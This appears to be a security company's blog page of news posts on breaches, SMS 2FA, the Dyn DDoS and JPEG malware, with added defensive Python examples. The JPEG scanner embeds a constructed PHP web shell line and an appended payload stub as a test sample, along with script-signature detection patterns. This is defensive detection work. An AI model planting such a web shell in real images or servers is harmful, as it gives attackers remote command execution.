Inc. Blog – Child Pornographers Hide in the Web’s Dark Corners. Intelliagg Is Helping Catch Them

When Intelliagg found evidence of crimes against children, it could have looked the other way. Instead, it volunteered to help bring the criminals to justice.

For most internet startups, “abuse” means users violating the terms of service by posting hate speech or sending spam or advertising adult services. But in some parts of the tech industry, the stakes are different. The cybersecurity firm Intelliagg didn’t set out to hunt down child abusers. But when the problem fell in its lap, the company’s staff didn’t feel like they could stand by and do nothing. Intelliagg didn’t just call the cops — the company also offered up its services to them, pro bono.

Vulnerability disclosure leads to stock price manipulation

Late last week the hedge fund Muddy Waters and the information security company MedSec made a surprising move: they shorted the stock of St. Jude Medical and then published findings on two vulnerabilities in its products, vulnerabilities that St. Jude Medical dismissed as non-issues. St. Jude Medical stock took a 10% tumble on Thursday and fell a further 2% before trading was halted. Muddy Waters and MedSec made a tidy profit.

This is the first time we have seen security vulnerabilities actively used to gain a market advantage by hurting a publicly traded company.

Considering that the usual disclosure paths are either to tell the vendor and wait, or to sell the vulnerabilities on the vulnerability market (if a buyer can be found), this is a departure from the standard venues for people who find vulnerabilities and want to profit from them.

60 million accounts from Dropbox hack dumped on the internet

On the 31st of August, account details for roughly 60 million users of the cloud storage provider Dropbox surfaced on the internet. The accounts were stolen during a previously disclosed breach in 2012, and Dropbox had already forced password resets earlier this week. Until now it was not known how many users had been affected; only now is it clear that the entire user database at the time was compromised.

Sources at various publications have received samples. In all, the leak is about 5 GB of data and contains the details of 68,680,741 accounts, including usernames, e-mail addresses and hashed passwords (reportedly a mix of bcrypt and salted SHA-1 hashes).

The data is legitimate, according to a senior Dropbox employee.

Earlier this week, Dropbox announced it was forcing password resets for a number of users after discovering a set of account details linked to the 2012 data breach. Dropbox did not publish any figure for the number of resets performed. According to Dropbox's statement in 2012

Credential stuffing and resold accounts on the dark web

This month several databases, including some claiming to come from targeted attacks on companies such as O2 and other providers, have surfaced on the dark web. O2 denies that there has been any data breach and cites credential stuffing as the likely cause. Credential stuffing is an attack in which the attacker takes previously leaked credentials and tries them against other services. Many companies are now experiencing this kind of attack: as soon as a mega-breach is discovered, criminal organisations work as fast as possible to reuse the old credentials elsewhere, so that their investment in the original hack is not wasted and the maximum value is extracted.

What can one do to protect oneself? It is very difficult to stop this outright if a customer reuses identical credentials and you rely on traditional passwords for authentication. A good way to thwart these attacks is to make 2FA mandatory for your customers. A next step is to acquire the breach lists and compare them internally against your customers' password hashes, forcing a password reset on every match; this also covers you if you are worried that the second factor runs over a channel that can be intercepted, such as SMS. Note that a leaked password can only be compared with your own store by re-hashing it with each affected user's salt and parameters; hashes produced by another site, with a different salt or algorithm, cannot be matched directly, and the most you learn from them is that the account appeared in the dump. In summary, just because a competitor or an unrelated company is compromised does not mean it cannot affect you.
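The cross-reference described above, as an added example (not Intelliagg code and not the product of any vendor mentioned here): the internal store is assumed to hold PBKDF2-HMAC-SHA256 hashes with a per-user random salt, the breach dump is assumed to arrive as (email, secret, kind) rows, and all accounts and dump rows are constructed for the example. Leaked cleartext passwords are re-hashed with the user's own salt and compared in constant time; leaked hashes made by the breached site are not comparable and only prove the address was in the dump.

```python
import hashlib
import hmac
import os

# Assumption: the internal user store keeps PBKDF2-HMAC-SHA256 hashes with a per-user random salt.
ITERATIONS = 100_000


def hash_password(password, salt, iterations=ITERATIONS):
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)


def make_user(email, password):
    """Create an internal account record the way the live system would store it."""
    salt = os.urandom(16)
    return {"email": email.lower(), "salt": salt, "hash": hash_password(password, salt)}


def check_breach_list(users, leak):
    """Cross-reference a breach dump against the internal store.

    leak rows are (email, secret, kind): kind "plain" means the dump holds the
    cleartext password; "foreign_hash" means it holds a hash made by the breached
    site, which cannot be compared against our own salted hashes.
    Returns {email: "reuse_confirmed" | "in_dump"}.
    """
    by_email = {u["email"]: u for u in users}
    verdicts = {}
    for email, secret, kind in leak:
        user = by_email.get(email.strip().lower())
        if user is None:
            continue  # not our customer
        if kind == "plain" and hmac.compare_digest(hash_password(secret, user["salt"]), user["hash"]):
            verdicts[user["email"]] = "reuse_confirmed"   # force a password reset
        else:
            verdicts.setdefault(user["email"], "in_dump")  # warn, watch logins, prompt for 2FA
    return verdicts


# Constructed sample data for this example.
SAMPLE_USERS = [
    make_user("alice@example.com", "Summer2012!"),
    make_user("bob@example.com", "correct horse battery"),
    make_user("carol@example.com", "only-used-here"),
]
SAMPLE_LEAK = [
    ("Alice@Example.com ", "Summer2012!", "plain"),                          # same password reused
    ("bob@example.com", "5baa61e4c9b93f3f0682250b6cf8331b", "foreign_hash"),  # cannot be compared
    ("carol@example.com", "something-else", "plain"),                        # in dump, different password
    ("dave@other.example", "hunter2", "plain"),                              # not our customer
]


def run_demo():
    return check_breach_list(SAMPLE_USERS, SAMPLE_LEAK)


if __name__ == "__main__":
    for email, verdict in sorted(run_demo().items()):
        print(f"{email}: {verdict}")
```

Accounts marked `reuse_confirmed` are the ones to reset immediately; the `in_dump` accounts are the ones whose next login attempts deserve extra scrutiny, because an attacker holding the dump will try them.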

Democratic National Committee hacked and emails released to the public

This month Wikileaks published internal, sensitive documents that came from a hack targeting the Democratic National Committee (DNC). This led to the eventual resignation of the DNC chair, Debbie Wasserman Schultz. CrowdStrike broke the news that Russian actors had hacked the DNC's email, but no details of how the attribution was performed have been shared with the public. Researchers could not definitively establish how the groups got into the systems, but the typical way in for these groups is carefully crafted deceptive emails, called “spearphishing”, that trick recipients into clicking malicious links.

At the same time, an independent threat actor calling itself “Guccifer 2.0” (a homage to the Romanian hacker “Guccifer”, who now awaits sentencing in the U.S. for similar hacks) claimed responsibility for the attacks and posted further documents said to come from the breach on various forums. Sources close to Wikileaks seem to support this version. Whether the attack can be attributed to Russian nation-state attackers or to independent adversaries is of little relevance here. What matters, for the DNC hack, is that people learn the importance of end-to-end encryption of email via S/MIME or PGP, and start focusing more on those problems. Bear in mind that end-to-end encryption protects mail in transit and at rest on the server, not on an endpoint that has already been compromised by spearphishing.

SMS-based Two-Factor Authentication (2FA) has been declared insecure

Two-factor authentication (2FA) adds an extra layer of security by requiring a one-time passcode, sent to you by SMS or voice call, when you log on to your account. 2FA via text message has until now been one of the most common forms. While 2FA tokens deter attackers because they require real-time input from the potential victim, today's malware is specifically designed to circumvent this measure, for example by intercepting the SMS on an infected phone.

The US National Institute of Standards and Technology (NIST) has released a new draft of its Digital Authentication Guideline (SP 800-63B) which deprecates SMS-based two-factor authentication on security grounds and signals that it will be disallowed in future. NIST says: “If the out of band verification is to be made using an SMS message on a public mobile telephone network, the verifier SHALL verify that the pre-registered telephone number being used is actually associated with a mobile network and not with a VoIP (or other software-based) service. It then sends the SMS message to the pre-registered telephone number. Changing the pre-registered telephone number SHALL NOT be possible without two-factor authentication at the time of the change. OOB [Out of band verification] using SMS is deprecated, and will no longer be allowed in future releases of this guidance.” This fits well with the large number of reports that endpoint devices may be under the attacker's control via malware, which no carrier-side check on the number can detect.
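The two interim requirements in the quoted draft, as an added example rather than anything from NIST or Intelliagg: a verifier that refuses to register a number unless it is on a mobile network, issues short-lived single-use codes with a guess limit, and refuses to change the registered number without a freshly verified code. The number-type table, the 600-second lifetime and the three-attempt limit are assumptions for the example; in production the number type comes from a carrier or number-portability lookup service.

```python
import secrets
import time

# Constructed number-type table for this example. In production the verifier asks a
# carrier / number-portability lookup service whether the number is on a mobile network.
NUMBER_TYPE = {
    "+15550100": "mobile",
    "+15550142": "mobile",
    "+15550199": "voip",
}
CODE_TTL_SECONDS = 600   # assumed policy: lifetime of an issued code
MAX_ATTEMPTS = 3         # assumed policy: wrong guesses allowed per issued code


class OobSmsVerifier:
    """Out-of-band SMS verifier enforcing the interim requirements quoted above."""

    def __init__(self, now=time.time, send_sms=None):
        self._now = now
        self._send = send_sms or (lambda phone, code: None)  # the real SMS gateway plugs in here
        self.registered = {}   # user -> phone number
        self.pending = {}      # user -> {"code", "expires", "attempts"}

    def register_number(self, user, phone):
        """Only numbers associated with a mobile network may be registered."""
        kind = NUMBER_TYPE.get(phone, "unknown")
        if kind != "mobile":
            raise ValueError(f"{phone} rejected: number type is {kind}, not a mobile network")
        self.registered[user] = phone

    def send_code(self, user):
        phone = self.registered[user]
        code = f"{secrets.randbelow(10 ** 6):06d}"
        self.pending[user] = {"code": code, "expires": self._now() + CODE_TTL_SECONDS, "attempts": 0}
        self._send(phone, code)

    def verify_code(self, user, code):
        entry = self.pending.get(user)
        if entry is None or self._now() > entry["expires"]:
            self.pending.pop(user, None)
            return False
        if secrets.compare_digest(entry["code"].encode(), str(code).encode()):
            del self.pending[user]          # single use
            return True
        entry["attempts"] += 1
        if entry["attempts"] >= MAX_ATTEMPTS:
            del self.pending[user]          # stop online guessing of the remaining digits
        return False

    def change_number(self, user, new_phone, code):
        """Changing the registered number requires a valid second factor at the time of the change."""
        if not self.verify_code(user, code):
            raise PermissionError("valid one-time code required to change the registered number")
        self.register_number(user, new_phone)


if __name__ == "__main__":
    outbox = []  # stands in for the SMS gateway so the demo runs offline
    verifier = OobSmsVerifier(send_sms=lambda phone, code: outbox.append((phone, code)))
    verifier.register_number("alice", "+15550100")
    verifier.send_code("alice")
    phone, code = outbox[-1]
    print("code sent to", phone, "verified:", verifier.verify_code("alice", code))
    try:
        verifier.register_number("bob", "+15550199")
    except ValueError as exc:
        print(exc)
```

Note what this does not solve: the code is still delivered to a handset, so malware on that handset reads it just as the user does. That is precisely why the draft deprecates SMS rather than merely tightening it.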

Large DDoS attack affecting multiple clients

Update: the attack appears to have been resolved by the provider at 20:00 Central European Time.

Intelliagg has seen an increase in traffic related to the botnet named “Mirai”, which is made up of hacked devices such as home routers, surveillance cameras and other “Internet of Things” (IoT) devices.

Today a large distributed denial of service attack has affected several of our clients. The attack is ongoing and has not yet been resolved.

What we know

Early research into the attack shows that the majority of the affected sites and clients have a tie to DynDNS, which reported the attack at 16:00 Central European Time.

It is unclear whether more DNS providers are targeted in the attack, but given the initial research on some of the big sites that have gone down, that is likely.

Intelliagg will continue to investigate and update information on this attack.

Who is affected

It looks like the attack is persistent and has targeted the core DNS service from a botnet with a so-called DNS amplification attack. Initially it seemed to affect only .com addresses, but we are now getting reports that .se addresses are affected too. According to our reports so far it seems addresses are not affected.

Recommended action

If you are affected and know that you use the targeted provider for DNS, we recommend temporarily moving DNS to an alternate provider or setting up a temporary local DNS server. Several of our clients have mitigated the attack by temporarily moving DNS resolution to Amazon AWS. Keep in mind that a move only takes effect once the NS delegation at the registrar has been updated and cached records have expired; a secondary provider configured in advance avoids that delay.
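A quick way to see whether a zone's authoritative servers are still answering, and whether they all sit with a single provider, as an added example (not an Intelliagg tool): it builds raw DNS queries with the standard library, sends one directly to each nameserver IP and reads the reply header, so a provider outage shows up as timeouts rather than as a cached answer from your local resolver. The nameserver hostnames and IPs in the demo are constructed placeholders; pass your own on the command line. The provider grouping keys on the last two labels of each NS hostname, a deliberately naive heuristic that misclassifies suffixes such as co.uk.

```python
import secrets
import socket
import struct


def build_query(name, txid, qtype=1):
    """Encode a DNS query; flags 0 (no recursion), which authoritative servers ignore anyway."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    labels = name.rstrip(".").split(".")
    qname = b"".join(bytes([len(label)]) + label.encode("ascii") for label in labels) + b"\x00"
    return header + qname + struct.pack(">HH", qtype, 1)  # QTYPE 1 = A, QCLASS 1 = IN


def parse_response(data, txid):
    """Decode the header of a DNS reply; raises if it does not belong to our query."""
    if len(data) < 12:
        raise ValueError("reply shorter than a DNS header")
    rid, flags, _qd, ancount, _ns, _ar = struct.unpack(">HHHHHH", data[:12])
    if rid != txid:
        raise ValueError("transaction id mismatch")
    if not flags & 0x8000:
        raise ValueError("QR bit clear: not a response")
    return {
        "rcode": flags & 0x000F,              # 0 NOERROR, 2 SERVFAIL, 3 NXDOMAIN, 5 REFUSED
        "authoritative": bool(flags & 0x0400),
        "truncated": bool(flags & 0x0200),
        "answers": ancount,
    }


def probe_nameservers(zone, server_ips, timeout=2.0):
    """Ask each server directly for the zone apex; timeouts here are what a provider outage looks like."""
    results = {}
    for server in server_ips:
        txid = secrets.randbelow(1 << 16)
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(timeout)
        try:
            sock.sendto(build_query(zone, txid), (server, 53))
            reply, _ = sock.recvfrom(4096)
            results[server] = parse_response(reply, txid)
        except (socket.timeout, OSError, ValueError) as exc:
            results[server] = {"error": type(exc).__name__}
        finally:
            sock.close()
    return results


def providers(ns_hosts):
    """Group NS hostnames by their last two labels to spot single-provider zones (naive heuristic)."""
    groups = {}
    for host in ns_hosts:
        key = ".".join(host.rstrip(".").split(".")[-2:])
        groups.setdefault(key, []).append(host)
    return groups


if __name__ == "__main__":
    import sys
    zone = sys.argv[1] if len(sys.argv) > 1 else "example.com"
    ns_hosts = sys.argv[2:] or ["ns1.dns-a.example", "ns2.dns-a.example"]  # constructed placeholders
    by_provider = providers(ns_hosts)
    if len(by_provider) < 2:
        print("warning: every nameserver sits with one provider:", by_provider)
    ips = {}
    for host in ns_hosts:
        try:
            ips[host] = socket.gethostbyname(host)
        except OSError:
            print(host, "does not resolve; the provider's own servers may already be unreachable")
    for host, ip in ips.items():
        print(host, ip, probe_nameservers(zone, [ip])[ip])
```

Run it as `python probe.py yourzone.example ns1.provider.example ns2.provider.example`. If every server returns an error or times out while your resolver still serves cached answers, you have the window the TTL gives you to add or switch to a second provider.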

For more information and updates

If you are affected, have any questions or would like advice on mitigation, please send an e-mail to 

Malware in syndicated adverts

Over the last month we have seen a large increase in adversaries buying access to existing ad providers that are accepted by the large advertising syndicates, and using these domains to serve targeted malware through mainstream and well-known media sites. This targeted malware appears to originate from Russia and Eastern Europe.

Intelliagg Launches the deeplight engine


Intelliagg (Threat Finder Ltd), provider of cyber threat intelligence services and software platforms for real-time cyber threat intelligence, today announced it has completed the software integration following its acquisition of DARKSUM, Inc., a leading innovator in darknet collection and analytics. Under the terms of the agreement, Intelliagg acquired all the assets, software, employees and intellectual property of DARKSUM for an undisclosed sum.

The combination of the DARKSUM and Intelliagg technologies changes the intelligence collection market by unifying world-class machine learning capabilities with complete darknet collection.

The technology stack powering the new Intelliagg service will be known as Deeplight and will be available for licensing as well as powering the Intelliagg managed services.


“Intelliagg built its reputation in security by enabling customers to effectively identify and respond to breaches and emerging threats. With this acquisition, our customers can now also better detect advanced threats found on the darknet – Breaches that are becoming more complex and severe with each passing day,” said Thomas Olofsson, co-founder of Intelliagg.

“With Deeplight, Intelliagg improves its capabilities in detecting and acting upon advanced threats by shining a light on those threat actors who are hiding on the darker areas of the net. By detecting and responding to known and unknown threats, and by providing a platform to detect, respond to, and automate actions, Intelliagg has further reinforced its position of moving its clients from a reactive to a proactive position”

“We founded DARKSUM with a vision to help clients be in a proactive stance when monitoring for threats found only in the dark web,” said Eric Michaud, CEO, DARKSUM. “By joining Intelliagg and applying their machine learning platform to our datasets we are able to better detect breaches and new threat actor behavior. DARKSUM has solved a problem that previously required significant manpower, expensive custom toolsets, and compute time. We are very excited to join the Intelliagg family and deliver new detection capabilities to customers.”

Key capabilities of the combined Deeplight solution include the ability to:

Detect physical and cyber threats against your organization

  • Continuous monitoring for and automatic detection of threats from private and open sources, using multi-domain analysis with machine learning.
  • Continuous monitoring of hundreds of thousands of darknet as well as open sources.
  • All events manually verified by skilled threat analysts

About Intelliagg

Intelliagg is a leading threat intelligence company working with organisations to control or evade data loss, reputational damage and targeted cyber crime through the provision of intelligence and automatic threat detection through machine learning.

The company provides a suite of professional and managed services that deal with cyber threat intelligence and incident response management.

Intelliagg was founded in London in 2011 and is privately held by its founders.

The company’s founders had a vision to bridge the gap between technical cyber protection and theoretical risk assessment models with actionable threat intelligence.

For more information go to

JPEG image exploits found on most popular adult sites

There have been increased reports of JPEG malware, where malicious code is inserted into what appears to be an innocuous file: the file is still a real JPEG containing an image, and the code is designed to execute when the file is opened. A valid JPEG does not execute by itself; the embedded code only runs if the viewer has an exploitable flaw in its image decoder, or if a loader already present on the machine extracts the payload from the image, so such files are usually one stage of a larger infection rather than the whole attack. The viewing of porn may not be allowed in your business, nor is it likely to be a comfortable topic you wish to openly discuss in your office.

However, businesses cannot escape the reality that porn sites get more visits per month than Netflix, Amazon and Twitter combined. The increased risk that malware on porn sites poses to businesses is no longer a topic businesses can afford to avoid. The chance of finding a porn site without images is about as likely as coming across a textbook without words, which makes such sites a perfect target for malware exploits hidden within image and video files.
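A structural check for the kind of tampering described above, as an added example (not from Intelliagg or any product mentioned on this page): it walks the JPEG marker segments, skips the entropy-coded scan data correctly, and flags data appended after the EOI marker, a missing EOI, oversized comment segments and comment or application segments carrying script-like text. The two sample files are constructed inline (the "clean" one is a minimal marker skeleton, not a decodable picture), the 4 KiB comment threshold and the signature list are assumptions for the example, and a clean result only means the container is well formed, not that a decoder bug cannot be triggered by the image data itself.

```python
import struct

SOI, EOI, SOS, COM = 0xD8, 0xD9, 0xDA, 0xFE
# Markers that carry no length field: TEM, SOI, EOI and the restart markers RST0..RST7.
STANDALONE = {0x01, SOI, EOI} | set(range(0xD0, 0xD8))
MAX_COMMENT = 4096                                   # assumed threshold: comments are normally tiny
SCRIPT_MARKERS = (b"<?php", b"<script", b"eval(", b"powershell")  # constructed, not a complete list


def parse_segments(data):
    """Walk the marker structure. Returns (segments, trailing_bytes, eoi_seen)."""
    if data[:2] != b"\xFF\xD8":
        raise ValueError("not a JPEG: missing SOI")
    segments, pos, eoi_seen = [(SOI, 0, 2)], 2, False
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:                  # fill byte preceding a marker
            pos += 1
            continue
        if marker in STANDALONE:
            segments.append((marker, pos, 2))
            pos += 2
            if marker == EOI:
                eoi_seen = True
                break
            continue
        if pos + 4 > len(data):
            raise ValueError(f"truncated segment header at offset {pos}")
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        if length < 2 or pos + 2 + length > len(data):
            raise ValueError(f"truncated segment at offset {pos}")
        segments.append((marker, pos, 2 + length))
        pos += 2 + length
        if marker == SOS:
            # Entropy-coded data follows with no length field: advance to the next real
            # marker. 0xFF00 is a stuffed byte and 0xFFD0..D7 are restart markers.
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    return segments, len(data) - pos, eoi_seen


def analyze(data):
    """Return a list of findings; an empty list means nothing structurally suspicious."""
    findings = []
    segments, trailing, eoi_seen = parse_segments(data)
    if not eoi_seen:
        findings.append("no EOI marker: file is truncated or malformed")
    if trailing:
        findings.append(f"{trailing} bytes of data after EOI")
    for marker, offset, length in segments:
        if marker == COM or 0xE0 <= marker <= 0xEF:          # COM and APP0..APP15
            body = data[offset + 4:offset + length]
            if marker == COM and length > MAX_COMMENT:
                findings.append(f"oversized comment segment ({length} bytes) at offset {offset}")
            for sig in SCRIPT_MARKERS:
                if sig in body:
                    findings.append(f"script marker {sig!r} in segment 0xFF{marker:02X} at offset {offset}")
    return findings


def _segment(marker, body):
    return b"\xFF" + bytes([marker]) + struct.pack(">H", len(body) + 2) + body


# Constructed sample: a minimal JPEG marker skeleton (APP0, SOF0, one scan), not a real picture.
APP0 = _segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
SOF0 = _segment(0xC0, b"\x08\x00\x01\x00\x01\x01\x01\x11\x00")
SCAN = _segment(SOS, b"\x01\x01\x00\x00\x3F\x00") + b"\x12\x34\xFF\x00\x56"  # includes a stuffed 0xFF00
CLEAN = b"\xFF\xD8" + APP0 + SOF0 + SCAN + b"\xFF\xD9"

# The same skeleton with a web shell in a comment segment and a payload appended after EOI.
INFECTED = (b"\xFF\xD8" + APP0
            + _segment(COM, b"<?php system($_GET['c']); ?>")
            + SOF0 + SCAN + b"\xFF\xD9"
            + b"MZ" + b"\x90" * 62)

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN), ("infected", INFECTED)):
        print(name, analyze(blob) or "ok")
```

Trailing data after EOI is the cheapest check and catches the most common "image plus payload" polyglots, because viewers stop reading at EOI and never notice what follows; the comment-segment signatures catch the uploaded-webshell variant where an image is later requested through a server-side interpreter.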